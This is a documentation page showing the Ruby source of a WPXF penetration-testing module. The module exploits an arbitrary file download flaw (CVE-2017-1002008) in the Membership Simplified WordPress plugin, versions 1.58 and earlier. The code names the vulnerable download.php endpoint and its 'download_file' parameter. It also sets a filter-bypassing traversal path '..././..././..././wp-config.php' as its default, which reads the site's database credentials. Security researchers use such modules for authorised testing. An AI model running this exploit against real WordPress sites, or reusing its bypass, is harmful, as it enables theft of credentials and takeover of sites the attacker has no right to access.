class Wpxf::Auxiliary::MembershipSimplifiedArbitraryFileDownload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 6 def initialize super update_info( name: 'Membership Simplified <= 1.58 Arbitrary File Download', desc: %( This module exploits a vulnerability which allows you to download any arbitrary file accessible by the user the web server is running as. Relative paths must use "..././" as opposed to "../", in order to bypass mitigation within the plugin. ), author: [ 'Larry W. Cashdollar', # Disclosure 'rastating' # WPXF module ], references: [ ['CVE', '2017-1002008'], ['WPVDB', '8777'], ['URL', 'http://www.vapidlabs.com/advisory.php?v=187'] ], date: 'Mar 13 2017' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 30 def check changelog = normalize_uri(wordpress_url_plugins, 'membership-simplified-for-oap-members-only', 'readme.txt') check_version_from_custom_file(changelog, /\=\s+Beta\s+(\d+\.\d+(\.\d+)*)\s+\=/, '1.59') end
default_remote_file_path()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 35 def default_remote_file_path '..././..././..././wp-config.php' end
download_request_params()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 47 def download_request_params { 'download_file' => remote_file } end
downloader_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 43 def downloader_url normalize_uri(wordpress_url_plugins, 'membership-simplified-for-oap-members-only', 'download.php') end
working_directory()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb, line 39 def working_directory 'wp-content/plugins/membership-simplified-for-oap-members-only' end